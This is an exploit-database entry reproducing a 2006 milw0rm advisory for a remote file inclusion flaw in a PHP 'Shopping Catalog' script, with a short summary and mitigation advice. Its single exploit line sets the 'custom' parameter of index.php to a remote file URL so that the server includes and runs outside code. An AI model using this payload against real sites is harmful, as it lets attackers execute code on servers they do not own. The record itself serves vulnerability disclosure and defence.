Shopping Catalog (RFI)

vendor:

Shopping Catalog

by:

v1per-haCker

9,3

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Shopping Catalog

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

The Shopping Catalog script is vulnerable to a Remote File Inclusion (RFI) vulnerability. This vulnerability allows an attacker to include a remote file, containing arbitrary code, on the vulnerable server. This can be exploited to execute arbitrary PHP code on the vulnerable server.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in web applications. This can be done by using a whitelist of accepted inputs that strictly conform to specifications.

Source

Exploit-DB raw data:

#=============================================================================================
#  Shopping Catalog (RFI)
#=============================================================================================
# Info:-
#
# Scripts: Shopping_Catalog
# download : http://www.gimescripts.com/categories/11%20Shopping%20Catalog%20PHP%20Script.zip
# Version : -
# Dork & vuln : download scripts and think :)
#
#=============================================================================================
#Exploit :
#
#http://localhost/path/index.php?function=custom&custom=http://EvElCoDe.txt?
#
#=============================================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#
#XP10_hackEr Team               >>      www.xp10.com
#SpeciaL PoweR SecuritY TeaM    >>      www.specialpower.org
#
#Greetz to :    | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  |
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |
#               | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  |
#               |  MuhaciR  | Skrmhcr-GVinux | Jean |
#
# Thanks >>     /str0ke & www.milw0rm.com & www.google.com
#==============================================================================================

# milw0rm.com [2006-11-09]